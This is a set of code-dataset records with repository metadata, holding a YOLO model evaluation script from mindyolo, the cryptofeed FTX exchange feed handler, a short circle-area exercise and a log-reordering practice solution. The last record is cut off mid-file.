cv2.Canny(x5,10,100)\r\n#cv2.imshow(\"edges\",edges)\r\n#abc=cv2.subtract(x5,edges)\r\n#cv2.imshow(\"abc\",abc)\r\n#cv2.waitKey(0)\r\n\r\n\r\n\r\n","repo_name":"yeshwanthramakrishna98/novel-blood-vessel-segmentation-for-retinal-fundus-image","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20485566767","text":"import argparse\nimport ast\nimport contextlib\nimport json\nimport os\nimport time\nimport yaml\nimport numpy as np\nfrom typing import Union\nfrom pathlib import Path\nfrom multiprocessing.pool import ThreadPool\nfrom pycocotools.coco import COCO\nfrom pycocotools.mask import encode\n\nimport mindspore as ms\nfrom mindspore import Tensor, context, nn, ParallelMode\nfrom mindspore.communication import init, get_rank, get_group_size\n\nfrom mindyolo.data import COCO80_TO_COCO91_CLASS, COCODataset, create_loader\nfrom mindyolo.models.model_factory import create_model\nfrom mindyolo.utils import logger, get_logger\nfrom mindyolo.utils.config import parse_args\nfrom mindyolo.utils.metrics import non_max_suppression, scale_coords, xyxy2xywh, scale_image, process_mask_upsample\nfrom mindyolo.utils.utils import set_seed, get_broadcast_datetime, Synchronizer\n\n\ndef get_parser_test(parents=None):\n parser = argparse.ArgumentParser(description=\"Test\", parents=[parents] if parents else [])\n parser.add_argument(\"--task\", type=str, default=\"detect\", choices=[\"detect\", \"segment\"])\n parser.add_argument(\"--device_target\", type=str, default=\"Ascend\", help=\"device target, Ascend/GPU/CPU\")\n parser.add_argument(\"--ms_mode\", type=int, default=0, help=\"train mode, graph/pynative\")\n parser.add_argument(\"--ms_amp_level\", type=str, default=\"O0\", help=\"amp level, O0/O1/O2\")\n parser.add_argument(\n \"--ms_enable_graph_kernel\", type=ast.literal_eval, default=False, help=\"use enable_graph_kernel or not\"\n )\n parser.add_argument(\"--weight\", type=str, default=\"yolov7_300.ckpt\", help=\"model.ckpt path(s)\")\n parser.add_argument(\"--per_batch_size\", type=int, default=32, help=\"size of each image batch\")\n parser.add_argument(\"--img_size\", type=int, default=640, help=\"inference size (pixels)\")\n parser.add_argument(\n \"--single_cls\", type=ast.literal_eval, default=False, help=\"train multi-class data as single-class\"\n )\n parser.add_argument(\"--rect\", type=ast.literal_eval, default=False, help=\"rectangular training\")\n parser.add_argument(\"--nms_time_limit\", type=float, default=60.0, help=\"time limit for NMS\")\n parser.add_argument(\"--conf_thres\", type=float, default=0.001, help=\"object confidence threshold\")\n parser.add_argument(\"--iou_thres\", type=float, default=0.65, help=\"IOU threshold for NMS\")\n parser.add_argument(\n \"--conf_free\", type=ast.literal_eval, default=False, help=\"Whether the prediction result include conf\"\n )\n parser.add_argument(\"--seed\", type=int, default=2, help=\"set global seed\")\n parser.add_argument(\"--log_level\", type=str, default=\"INFO\", help=\"save dir\")\n parser.add_argument(\"--save_dir\", type=str, default=\"./runs_test\", help=\"save dir\")\n\n # args for ModelArts\n parser.add_argument(\"--enable_modelarts\", type=ast.literal_eval, default=False, help=\"enable modelarts\")\n parser.add_argument(\"--data_url\", type=str, default=\"\", help=\"ModelArts: obs path to dataset folder\")\n parser.add_argument(\"--ckpt_url\", type=str, default=\"\", help=\"ModelArts: obs path to checkpoint folder\")\n parser.add_argument(\"--train_url\", type=str, default=\"\", help=\"ModelArts: obs path to dataset folder\")\n parser.add_argument(\n \"--data_dir\", type=str, default=\"/cache/data/\", help=\"ModelArts: local device path to dataset folder\"\n )\n parser.add_argument(\"--is_parallel\", type=ast.literal_eval, default=False, help=\"Distribute test or not\")\n parser.add_argument(\n \"--ckpt_dir\",\n type=str,\n default=\"/cache/pretrain_ckpt/\",\n help=\"ModelArts: local device path to checkpoint folder\",\n )\n return parser\n\n\ndef set_default_test(args):\n # Set Context\n context.set_context(mode=args.ms_mode, device_target=args.device_target, max_call_depth=2000)\n if args.device_target == \"Ascend\":\n context.set_context(device_id=int(os.getenv(\"DEVICE_ID\", 0)))\n elif args.device_target == \"GPU\" and args.ms_enable_graph_kernel:\n context.set_context(enable_graph_kernel=True)\n # Set Parallel\n if args.is_parallel:\n init()\n args.rank, args.rank_size, parallel_mode = get_rank(), get_group_size(), ParallelMode.DATA_PARALLEL\n context.set_auto_parallel_context(device_num=args.rank_size, parallel_mode=parallel_mode)\n else:\n args.rank, args.rank_size = 0, 1\n # Set Data\n args.data.nc = 1 if args.single_cls else int(args.data.nc) # number of classes\n args.data.names = [\"item\"] if args.single_cls and len(args.names) != 1 else args.data.names # class names\n assert len(args.data.names) == args.data.nc, \"%g names found for nc=%g dataset in %s\" % (\n len(args.data.names),\n args.data.nc,\n args.config,\n )\n # Directories and Save run settings\n time = get_broadcast_datetime(rank_size=args.rank_size)\n args.save_dir = os.path.join(\n args.save_dir, f'{time[0]:04d}.{time[1]:02d}.{time[2]:02d}-{time[3]:02d}.{time[4]:02d}.{time[5]:02d}')\n os.makedirs(args.save_dir, exist_ok=True)\n if args.rank % args.rank_size == 0:\n with open(os.path.join(args.save_dir, \"cfg.yaml\"), \"w\") as f:\n yaml.dump(vars(args), f, sort_keys=False)\n # Set Logger\n logger.setup_logging(logger_name=\"MindYOLO\", log_level=\"INFO\", rank_id=args.rank, device_per_servers=args.rank_size)\n logger.setup_logging_file(log_dir=os.path.join(args.save_dir, \"logs\"))\n # Modelarts: Copy data, from the s3 bucket to the computing node; Reset dataset dir.\n if args.enable_modelarts:\n from mindyolo.utils.modelarts import sync_data\n\n os.makedirs(args.data_dir, exist_ok=True)\n sync_data(args.data_url, args.data_dir)\n sync_data(args.save_dir, args.train_url)\n if args.ckpt_url:\n sync_data(args.ckpt_url, args.ckpt_dir) # pretrain ckpt\n # args.data.dataset_dir = os.path.join(args.data_dir, args.data.dataset_dir)\n args.data.val_set = os.path.join(args.data_dir, args.data.val_set)\n args.data.test_set = os.path.join(args.data_dir, args.data.test_set)\n args.weight = args.ckpt_dir if args.ckpt_dir else \"\"\n\n\ndef test(task, **kwargs):\n if task == \"detect\":\n return test_detect(**kwargs)\n elif task == \"segment\":\n return test_segment(**kwargs)\n\n\ndef test_detect(\n network: nn.Cell,\n dataloader: ms.dataset.Dataset,\n anno_json_path: str,\n conf_thres: float = 0.001,\n iou_thres: float = 0.65,\n conf_free: bool = False,\n num_class: int = 80,\n nms_time_limit: float = -1.0,\n is_coco_dataset: bool = True,\n imgIds: list = [],\n per_batch_size: int = -1,\n rank: int = 0,\n rank_size: int = 1,\n save_dir: str = '',\n synchronizer: Synchronizer = None,\n cur_epoch: Union[str, int] = 0, # to distinguish saving directory from different epoch in eval while run mode\n):\n try:\n from mindyolo.csrc import COCOeval_fast as COCOeval\n except ImportError:\n logger.warning(f'unable to load fast_coco_eval api, use normal one instead')\n from pycocotools.cocoeval import COCOeval\n\n steps_per_epoch = dataloader.get_dataset_size()\n loader = dataloader.create_dict_iterator(output_numpy=True, num_epochs=1)\n coco91class = COCO80_TO_COCO91_CLASS\n\n sample_num = 0\n infer_times = 0.0\n nms_times = 0.0\n result_dicts = []\n\n for i, data in enumerate(loader):\n imgs, paths, ori_shape, pad, hw_scale = (\n data[\"images\"],\n data[\"img_files\"],\n data[\"hw_ori\"],\n data[\"pad\"],\n data[\"hw_scale\"],\n )\n nb, _, height, width = imgs.shape\n imgs = Tensor(imgs, ms.float32)\n\n # Run infer\n _t = time.time()\n out, _ = network(imgs) # inference and training outputs\n infer_times += time.time() - _t\n\n # Run NMS\n t = time.time()\n out = out.asnumpy()\n out = non_max_suppression(\n out,\n conf_thres=conf_thres,\n iou_thres=iou_thres,\n conf_free=conf_free,\n multi_label=True,\n time_limit=nms_time_limit,\n )\n nms_times += time.time() - t\n\n # Statistics pred\n for si, pred in enumerate(out):\n path = Path(str(paths[si]))\n sample_num += 1\n if len(pred) == 0:\n continue\n\n # Predictions\n predn = np.copy(pred)\n scale_coords(\n imgs[si].shape[1:], predn[:, :4], ori_shape[si], ratio=hw_scale[si], pad=pad[si]\n ) # native-space pred\n\n image_id = int(path.stem) if path.stem.isnumeric() else path.stem\n box = xyxy2xywh(predn[:, :4]) # xywh\n box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner\n for p, b in zip(pred.tolist(), box.tolist()):\n result_dicts.append(\n {\n \"image_id\": image_id,\n \"category_id\": coco91class[int(p[5])] if is_coco_dataset else int(p[5]),\n \"bbox\": [round(x, 3) for x in b],\n \"score\": round(p[4], 5),\n }\n )\n logger.info(f\"Sample {steps_per_epoch}/{i + 1}, time cost: {(time.time() - _t) * 1000:.2f} ms.\")\n\n # save and load result file for distributed case\n if rank_size > 1:\n # save result to file\n # each epoch has a unique directory in eval while run mode\n infer_dir = os.path.join(save_dir, 'infer', str(cur_epoch))\n os.makedirs(infer_dir, exist_ok=True)\n infer_path = os.path.join(infer_dir, f'det_result_rank{rank}_{rank_size}.json')\n with open(infer_path, 'w') as f:\n json.dump(result_dicts, f)\n # synchronize\n assert synchronizer is not None\n synchronizer()\n\n # load file to result_dicts\n f_names = os.listdir(infer_dir)\n f_paths = [os.path.join(infer_dir, f) for f in f_names]\n logger.info(f\"Loading {len(f_names)} eval file from directory {infer_dir}: {sorted(f_names)}.\")\n assert len(f_names) == rank_size, f'number of eval file({len(f_names)}) should be equal to rank size({rank_size})'\n result_dicts = []\n for path in f_paths:\n with open(path, 'r') as fp:\n result_dicts += json.load(fp)\n\n # Compute mAP\n if not result_dicts:\n logger.warning(f'Got 0 bbox after NMS, skip computing map')\n map, map50 = 0.0, 0.0\n else:\n try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb\n with contextlib.redirect_stdout(get_logger()): # redirect stdout to logger\n anno = COCO(anno_json_path) # init annotations api\n pred = anno.loadRes(result_dicts) # init predictions api\n eval = COCOeval(anno, pred, \"bbox\")\n if is_coco_dataset:\n eval.params.imgIds = imgIds\n eval.evaluate()\n eval.accumulate()\n eval.summarize()\n map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)\n except Exception as e:\n logger.error(f\"pycocotools unable to run: {e}\")\n raise e\n\n t = tuple(x / sample_num * 1E3 for x in (infer_times, nms_times, infer_times + nms_times)) + \\\n (height, width, per_batch_size) # tuple\n logger.info(f'Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g;' % t)\n\n return map, map50\n\n\ndef test_segment(\n network: nn.Cell,\n dataloader: ms.dataset.Dataset,\n anno_json_path: str,\n conf_thres: float = 0.001,\n iou_thres: float = 0.65,\n conf_free: bool = False,\n num_class: int = 80,\n nms_time_limit: float = -1.0,\n is_coco_dataset: bool = True,\n imgIds: list = [],\n per_batch_size: int = -1,\n rank: int = 0,\n rank_size: int = 1,\n save_dir: str = '',\n synchronizer: Synchronizer = None,\n cur_epoch: Union[str, int] = 0, # to distinguish saving directory from different epoch in eval while run mode\n):\n try:\n from mindyolo.csrc import COCOeval_fast as COCOeval\n except ImportError:\n logger.warning(f'unable to load fast_coco_eval api, use normal one instead')\n from pycocotools.cocoeval import COCOeval\n\n steps_per_epoch = dataloader.get_dataset_size()\n loader = dataloader.create_dict_iterator(output_numpy=True, num_epochs=1)\n coco91class = COCO80_TO_COCO91_CLASS\n\n sample_num = 0\n infer_times = 0.0\n nms_times = 0.0\n result_dicts = []\n\n for i, data in enumerate(loader):\n imgs, paths, ori_shape, pad, hw_scale = (\n data[\"images\"],\n data[\"img_files\"],\n data[\"hw_ori\"],\n data[\"pad\"],\n data[\"hw_scale\"],\n )\n nb, _, height, width = imgs.shape\n imgs = Tensor(imgs, ms.float32)\n\n # Run infer\n _t = time.time()\n out, (_, _, prototypes) = network(imgs) # inference and training outputs\n infer_times += time.time() - _t\n\n # Run NMS\n t = time.time()\n _c = num_class + 4 if conf_free else num_class + 5\n out = out.asnumpy()\n bboxes, mask_coefficient = out[:, :, :_c], out[:, :, _c:]\n out = non_max_suppression(\n bboxes,\n mask_coefficient,\n conf_thres=conf_thres,\n iou_thres=iou_thres,\n conf_free=conf_free,\n multi_label=True,\n time_limit=nms_time_limit,\n )\n nms_times += time.time() - t\n\n p = prototypes.asnumpy()\n\n # Statistics pred\n for si, (pred, proto) in enumerate(zip(out, p)):\n path = Path(str(paths[si]))\n sample_num += 1\n if len(pred) == 0:\n continue\n\n # Predictions\n pred_masks = process_mask_upsample(proto, pred[:, 6:], pred[:, :4], shape=imgs[si].shape[1:])\n pred_masks = pred_masks.astype('float32')\n pred_masks = scale_image(pred_masks.transpose(1, 2, 0), ori_shape[si], pad=pad[si])\n predn = np.copy(pred)\n scale_coords(\n imgs[si].shape[1:], predn[:, :4], ori_shape[si], ratio=hw_scale[si], pad=pad[si]\n ) # native-space pred\n\n def single_encode(x):\n \"\"\"Encode predicted masks as RLE and append results to jdict.\"\"\"\n rle = encode(np.asarray(x[:, :, None], order='F', dtype='uint8'))[0]\n rle['counts'] = rle['counts'].decode('utf-8')\n return rle\n\n image_id = int(path.stem) if path.stem.isnumeric() else path.stem\n box = xyxy2xywh(predn[:, :4]) # xywh\n box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner\n pred_masks = np.transpose(pred_masks, (2, 0, 1))\n rles = []\n for _i in range(pred_masks.shape[0]):\n rles.append(single_encode(pred_masks[_i]))\n for j, (p, b) in enumerate(zip(pred.tolist(), box.tolist())):\n result_dicts.append(\n {\n \"image_id\": image_id,\n \"category_id\": coco91class[int(p[5])] if is_coco_dataset else int(p[5]),\n \"bbox\": [round(x, 3) for x in b],\n \"score\": round(p[4], 5),\n \"segmentation\": rles[j]\n }\n )\n logger.info(f\"Sample {steps_per_epoch}/{i + 1}, time cost: {(time.time() - _t) * 1000:.2f} ms.\")\n\n # save and load result file for distributed case\n if rank_size > 1:\n # save result to file\n # each epoch has a unique directory in eval while run mode\n infer_dir = os.path.join(save_dir, 'infer', str(cur_epoch))\n os.makedirs(infer_dir, exist_ok=True)\n infer_path = os.path.join(infer_dir, f'det_result_rank{rank}_{rank_size}.json')\n with open(infer_path, 'w') as f:\n json.dump(result_dicts, f)\n # synchronize\n assert synchronizer is not None\n synchronizer()\n\n # load file to result_dicts\n f_names = os.listdir(infer_dir)\n f_paths = [os.path.join(infer_dir, f) for f in f_names]\n logger.info(f\"Loading {len(f_names)} eval file from directory {infer_dir}: {sorted(f_names)}.\")\n assert len(f_names) == rank_size, f'number of eval file({len(f_names)}) should be equal to rank size({rank_size})'\n result_dicts = []\n for path in f_paths:\n with open(path, 'r') as fp:\n result_dicts += json.load(fp)\n\n # Compute mAP\n if not result_dicts:\n logger.warning(f'Got 0 bbox after NMS, skip computing map')\n map_bbox, map50_bbox, map_mask, map50_mask = 0.0, 0.0, 0.0, 0.0\n else:\n try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb\n print(\"Object detection:\")\n with contextlib.redirect_stdout(get_logger()): # redirect stdout to logger\n anno = COCO(anno_json_path) # init annotations api\n pred = anno.loadRes(result_dicts) # init predictions api\n eval = COCOeval(anno, pred, \"bbox\")\n if is_coco_dataset:\n eval.params.imgIds = imgIds\n eval.evaluate()\n eval.accumulate()\n eval.summarize()\n map_bbox, map50_bbox = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)\n print('\\n')\n print(\"Instance segmentation:\")\n with contextlib.redirect_stdout(get_logger()): # redirect stdout to logger\n anno = COCO(anno_json_path) # init annotations api\n pred = anno.loadRes(result_dicts) # init predictions api\n eval = COCOeval(anno, pred, \"segm\")\n if is_coco_dataset:\n eval.params.imgIds = imgIds\n eval.evaluate()\n eval.accumulate()\n eval.summarize()\n map_mask, map50_mask = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)\n except Exception as e:\n logger.error(f\"pycocotools unable to run: {e}\")\n raise e\n\n t = tuple(x / sample_num * 1E3 for x in (infer_times, nms_times, infer_times + nms_times)) + \\\n (height, width, per_batch_size) # tuple\n logger.info(f'Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g;' % t)\n\n return map_bbox, map50_bbox, map_mask, map50_mask\n\n\ndef main(args):\n # Init\n s_time = time.time()\n set_seed(args.seed)\n set_default_test(args)\n logger.info(f\"parse_args:\\n{args}\")\n\n # Create Network\n network = create_model(\n model_name=args.network.model_name,\n model_cfg=args.network,\n num_classes=args.data.nc,\n sync_bn=False,\n checkpoint_path=args.weight,\n )\n network.set_train(False)\n ms.amp.auto_mixed_precision(network, amp_level=args.ms_amp_level)\n\n # Create Dataloader\n dataset_path = args.data.val_set\n is_coco_dataset = \"coco\" in args.data.dataset_name\n dataset = COCODataset(\n dataset_path=dataset_path,\n img_size=args.img_size,\n transforms_dict=args.data.test_transforms,\n is_training=False,\n augment=False,\n rect=args.rect,\n single_cls=args.single_cls,\n batch_size=args.per_batch_size,\n stride=max(args.network.stride),\n )\n dataloader = create_loader(\n dataset=dataset,\n batch_collate_fn=dataset.test_collate_fn,\n column_names_getitem=dataset.column_names_getitem,\n column_names_collate=dataset.column_names_collate,\n batch_size=args.per_batch_size,\n epoch_size=1,\n rank=args.rank,\n rank_size=args.rank_size,\n shuffle=False,\n drop_remainder=False,\n num_parallel_workers=args.data.num_parallel_workers,\n python_multiprocessing=True,\n )\n\n # Run test\n test(\n task=args.task,\n network=network,\n dataloader=dataloader,\n anno_json_path=os.path.join(\n args.data.val_set[: -len(args.data.val_set.split(\"/\")[-1])], \"annotations/instances_val2017.json\"\n ),\n conf_thres=args.conf_thres,\n iou_thres=args.iou_thres,\n conf_free=args.conf_free,\n num_class=args.data.nc,\n nms_time_limit=args.nms_time_limit,\n is_coco_dataset=is_coco_dataset,\n imgIds=None if not is_coco_dataset else dataset.imgIds,\n per_batch_size=args.per_batch_size,\n rank=args.rank,\n rank_size=args.rank_size,\n save_dir=args.save_dir,\n synchronizer=Synchronizer(args.rank_size) if args.rank_size > 1 else None,\n )\n e_time = time.time()\n logger.info(f\"Testing completed, cost {e_time - s_time:.2f}s.\")\n\n\nif __name__ == \"__main__\":\n parser = get_parser_test()\n args = parse_args(parser)\n main(args)\n","repo_name":"mindspore-lab/mindyolo","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":20864,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"22968218969","text":"\nsugar = 5\n\n#kerület\nkerulet = 2 * sugar * 3.14\nprint(\"A kör kerülete:\", round(kerulet)) # round() függvény kerekítés\n# strineget és változót vesszővel fűzök össze pl: (\"A kör kerülete:\", round(kerulet))\n\n#terület\nterulet = sugar ** 2 * 3.14\nprint(\"A kör területe:\", terulet)\n","repo_name":"peterteszary/Vasvari-Code-Repository-For-Study-Purposes","sub_path":"Python Projects/Class_Pys/kör.py","file_name":"kör.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12914322351","text":"import asyncio\nimport logging\nfrom decimal import Decimal\nfrom time import time\nimport zlib\nfrom typing import Iterable\n\nimport aiohttp\nfrom sortedcontainers import SortedDict as sd\nfrom yapic import json\n\nfrom cryptofeed.connection import AsyncConnection\nfrom cryptofeed.defines import BID, ASK, BUY\nfrom cryptofeed.defines import FTX as FTX_id\nfrom cryptofeed.defines import FUNDING, L2_BOOK, LIQUIDATIONS, OPEN_INTEREST, SELL, TICKER, TRADES\nfrom cryptofeed.exceptions import BadChecksum\nfrom cryptofeed.feed import Feed\nfrom cryptofeed.standards import symbol_exchange_to_std, timestamp_normalize\n\n\nLOG = logging.getLogger('feedhandler')\n\n\nclass FTX(Feed):\n id = FTX_id\n\n def __init__(self, **kwargs):\n super().__init__('wss://ftexchange.com/ws/', **kwargs)\n\n def __reset(self):\n self.l2_book = {}\n self.funding = {}\n self.open_interest = {}\n\n async def subscribe(self, conn: AsyncConnection):\n self.__reset()\n for chan in set(self.channels or self.subscription):\n symbols = set(self.symbols or self.subscription[chan])\n if chan == FUNDING:\n asyncio.create_task(self._funding(symbols)) # TODO: use HTTPAsyncConn\n continue\n if chan == OPEN_INTEREST:\n asyncio.create_task(self._open_interest(symbols)) # TODO: use HTTPAsyncConn\n continue\n for pair in symbols:\n await conn.send(json.dumps(\n {\n \"channel\": chan,\n \"market\": pair,\n \"op\": \"subscribe\"\n }\n ))\n\n def __calc_checksum(self, pair):\n bid_it = reversed(self.l2_book[pair][BID])\n ask_it = iter(self.l2_book[pair][ASK])\n\n bids = [f\"{bid}:{self.l2_book[pair][BID][bid]}\" for bid in bid_it]\n asks = [f\"{ask}:{self.l2_book[pair][ASK][ask]}\" for ask in ask_it]\n\n if len(bids) == len(asks):\n combined = [val for pair in zip(bids, asks) for val in pair]\n elif len(bids) > len(asks):\n combined = [val for pair in zip(bids[:len(asks)], asks) for val in pair]\n combined += bids[len(asks):]\n else:\n combined = [val for pair in zip(bids, asks[:len(bids)]) for val in pair]\n combined += asks[len(bids):]\n\n computed = \":\".join(combined).encode()\n return zlib.crc32(computed)\n\n async def _open_interest(self, pairs: Iterable):\n \"\"\"\n {\n \"success\": true,\n \"result\": {\n \"volume\": 1000.23,\n \"nextFundingRate\": 0.00025,\n \"nextFundingTime\": \"2019-03-29T03:00:00+00:00\",\n \"expirationPrice\": 3992.1,\n \"predictedExpirationPrice\": 3993.6,\n \"strikePrice\": 8182.35,\n \"openInterest\": 21124.583\n }\n }\n \"\"\"\n\n rate_limiter = 1 # don't fetch too many pairs too fast\n async with aiohttp.ClientSession() as session:\n while True:\n for pair in pairs:\n # OI only for perp and futures, so check for / in pair name indicating spot\n if '/' in pair:\n continue\n end_point = f\"https://ftx.com/api/futures/{pair}/stats\"\n async with session.get(end_point) as response:\n data = await response.text()\n data = json.loads(data, parse_float=Decimal)\n if 'result' in data:\n oi = data['result']['openInterest']\n if oi != self.open_interest.get(pair, None):\n await self.callback(OPEN_INTEREST,\n feed=self.id,\n symbol=pair,\n open_interest=oi,\n timestamp=time(),\n receipt_timestamp=time()\n )\n self.open_interest[pair] = oi\n await asyncio.sleep(rate_limiter)\n wait_time = 60\n await asyncio.sleep(wait_time)\n\n async def _funding(self, pairs: Iterable):\n \"\"\"\n {\n \"success\": true,\n \"result\": [\n {\n \"future\": \"BTC-PERP\",\n \"rate\": 0.0025,\n \"time\": \"2019-06-02T08:00:00+00:00\"\n }\n ]\n }\n \"\"\"\n # do not send more than 30 requests per second: doing so will result in HTTP 429 errors\n rate_limiter = 0.1\n # funding rates do not change frequently\n wait_time = 60\n async with aiohttp.ClientSession() as session:\n while True:\n for pair in pairs:\n if '-PERP' not in pair:\n continue\n async with session.get(f\"https://ftx.com/api/funding_rates?future={pair}\") as response:\n data = await response.text()\n data = json.loads(data, parse_float=Decimal)\n\n last_update = self.funding.get(pair, None)\n update = str(data['result'][0]['rate']) + str(data['result'][0]['time'])\n if last_update and last_update == update:\n continue\n else:\n self.funding[pair] = update\n\n await self.callback(FUNDING, feed=self.id,\n symbol=symbol_exchange_to_std(data['result'][0]['future']),\n rate=data['result'][0]['rate'],\n timestamp=timestamp_normalize(self.id, data['result'][0]['time']))\n await asyncio.sleep(rate_limiter)\n await asyncio.sleep(wait_time)\n\n async def _trade(self, msg: dict, timestamp: float):\n \"\"\"\n example message:\n\n {\"channel\": \"trades\", \"market\": \"BTC-PERP\", \"type\": \"update\", \"data\": [{\"id\": null, \"price\": 10738.75,\n \"size\": 0.3616, \"side\": \"buy\", \"liquidation\": false, \"time\": \"2019-08-03T12:20:19.170586+00:00\"}]}\n \"\"\"\n for trade in msg['data']:\n await self.callback(TRADES, feed=self.id,\n symbol=symbol_exchange_to_std(msg['market']),\n side=BUY if trade['side'] == 'buy' else SELL,\n amount=Decimal(trade['size']),\n price=Decimal(trade['price']),\n order_id=None,\n timestamp=float(timestamp_normalize(self.id, trade['time'])),\n receipt_timestamp=timestamp)\n if bool(trade['liquidation']):\n await self.callback(LIQUIDATIONS,\n feed=self.id,\n symbol=symbol_exchange_to_std(msg['market']),\n side=BUY if trade['side'] == 'buy' else SELL,\n leaves_qty=Decimal(trade['size']),\n price=Decimal(trade['price']),\n order_id=None,\n timestamp=float(timestamp_normalize(self.id, trade['time'])),\n receipt_timestamp=timestamp\n )\n\n async def _ticker(self, msg: dict, timestamp: float):\n \"\"\"\n example message:\n\n {\"channel\": \"ticker\", \"market\": \"BTC/USD\", \"type\": \"update\", \"data\": {\"bid\": 10717.5, \"ask\": 10719.0,\n \"last\": 10719.0, \"time\": 1564834587.1299787}}\n \"\"\"\n await self.callback(TICKER, feed=self.id,\n symbol=symbol_exchange_to_std(msg['market']),\n bid=Decimal(msg['data']['bid'] if msg['data']['bid'] else 0.0),\n ask=Decimal(msg['data']['ask'] if msg['data']['ask'] else 0.0),\n timestamp=float(msg['data']['time']),\n receipt_timestamp=timestamp)\n\n async def _book(self, msg: dict, timestamp: float):\n \"\"\"\n example messages:\n\n snapshot:\n {\"channel\": \"orderbook\", \"market\": \"BTC/USD\", \"type\": \"partial\", \"data\": {\"time\": 1564834586.3382702,\n \"checksum\": 427503966, \"bids\": [[10717.5, 4.092], ...], \"asks\": [[10720.5, 15.3458], ...], \"action\": \"partial\"}}\n\n update:\n {\"channel\": \"orderbook\", \"market\": \"BTC/USD\", \"type\": \"update\", \"data\": {\"time\": 1564834587.1299787,\n \"checksum\": 3115602423, \"bids\": [], \"asks\": [[10719.0, 14.7461]], \"action\": \"update\"}}\n \"\"\"\n check = msg['data']['checksum']\n if msg['type'] == 'partial':\n # snapshot\n pair = symbol_exchange_to_std(msg['market'])\n self.l2_book[pair] = {\n BID: sd({\n Decimal(price): Decimal(amount) for price, amount in msg['data']['bids']\n }),\n ASK: sd({\n Decimal(price): Decimal(amount) for price, amount in msg['data']['asks']\n })\n }\n if self.checksum_validation and self.__calc_checksum(pair) != check:\n raise BadChecksum\n await self.book_callback(self.l2_book[pair], L2_BOOK, pair, True, None, float(msg['data']['time']), timestamp)\n else:\n # update\n delta = {BID: [], ASK: []}\n pair = symbol_exchange_to_std(msg['market'])\n for side in ('bids', 'asks'):\n s = BID if side == 'bids' else ASK\n for price, amount in msg['data'][side]:\n price = Decimal(price)\n amount = Decimal(amount)\n if amount == 0:\n delta[s].append((price, 0))\n del self.l2_book[pair][s][price]\n else:\n delta[s].append((price, amount))\n self.l2_book[pair][s][price] = amount\n if self.checksum_validation and self.__calc_checksum(pair) != check:\n raise BadChecksum\n await self.book_callback(self.l2_book[pair], L2_BOOK, pair, False, delta, float(msg['data']['time']), timestamp)\n\n async def message_handler(self, msg: str, conn, timestamp: float):\n\n msg = json.loads(msg, parse_float=Decimal)\n if 'type' in msg and msg['type'] == 'subscribed':\n return\n elif 'channel' in msg:\n if msg['channel'] == 'orderbook':\n await self._book(msg, timestamp)\n elif msg['channel'] == 'trades':\n await self._trade(msg, timestamp)\n elif msg['channel'] == 'ticker':\n await self._ticker(msg, timestamp)\n else:\n LOG.warning(\"%s: Invalid message type %s\", self.id, msg)\n else:\n LOG.warning(\"%s: Invalid message type %s\", self.id, msg)\n","repo_name":"Quirky-Fox/cryptofeed-old","sub_path":"cryptofeed/exchange/ftx.py","file_name":"ftx.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"10512418600","text":"## 로그파일재정렬\nfrom typing import *\nimport operator\n## 내풀이\ndef my_solution(logs: List[str]) -> List[str]:\n digit_list = []\n letter_list = []\n for log in logs:\n identifier = \"\".join(log.split(\" \")[1::])\n if identifier.isdigit():\n digit_list.append(log)\n else:\n letter_list.append(log)\n\n\n\n for i, v in enumerate(letter_list):\n\n\n for i1 in range(i + 1, len(letter_list)):\n main_identifier = letter_list[i].split(\" \")[0]\n main_content = letter_list[i].split(\" \")[1::]\n\n identifier = letter_list[i1].split(\" \")[0]\n content = letter_list[i1].split(\" \")[1::]\n\n if (content == main_content and identifier < main_identifier) or (content < main_content):\n temp_letter = letter_list[i1]\n letter_list[i1] = letter_list[i]\n letter_list[i] = temp_letter\n\n return letter_list + digit_list\n\ndef my_solution1(logs: []) -> []:\n digit_list = []\n letter_list = []\n for log in logs:\n identifier = \"\".join(log.split(\" \")[1::])\n if identifier.isdigit():\n digit_list.append(log)\n else:\n letter_list.append(log)\n\n\n\n for i, v in enumerate(letter_list):\n\n\n for i1 in range(i + 1, len(letter_list)):\n main_identifier = letter_list[i].split(\" \")[0]\n main_content = letter_list[i].split(\" \")[1::]\n\n identifier = letter_list[i1].split(\" \")[0]\n content = letter_list[i1].split(\" \")[1::]\n\n if (content == main_content and identifier < main_identifier) or (content < main_content):\n temp_letter = letter_list[i1]\n letter_list[i1] = letter_list[i]\n letter_list[i] = temp_letter\n\n return letter_list + digit_list\n\n\ndef my_solution2(logs: List[str]) -> List[str]:\n digits = []\n letters = []\n\n for l in logs:\n if l.split()[1].isdigit():\n digits.append(l)\n else:\n letters.append([l.split()[0], l.split()[1::]])\n\n letters = sorted(letters, key=operator.itemgetter(1,0))\n re_letters = []\n for let in letters:\n re_letters.append(let[0]+ \" \" + \" \".join(let[1]))\n\n return re_letters + digits\n\n## 람다와 + 연산자 이용\ndef solution1(logs: []) -> []:\n letters, digits = [], []\n\n for log in logs:\n if log.split()[1].isdigit():\n digits.append(log)\n else:\n letters.append(log)\n\n letters.sort(key=lambda x: (x.split()[1:], x.split()[0]))\n return letters + digits\nif __name__ == '__main__':\n\n print(my_solution2([\"a1 9 2 3 1\",\"g1 act car\",\"zo4 4 7\",\"ab1 off key dog\",\"a8 act zoo\",\"a7 act zoo\"]))\n # [\"27 85717 7\", \"2 y xyr fc\", \"52 314 99\", \"d 046099 0\", \"m azv x f\", \"7e 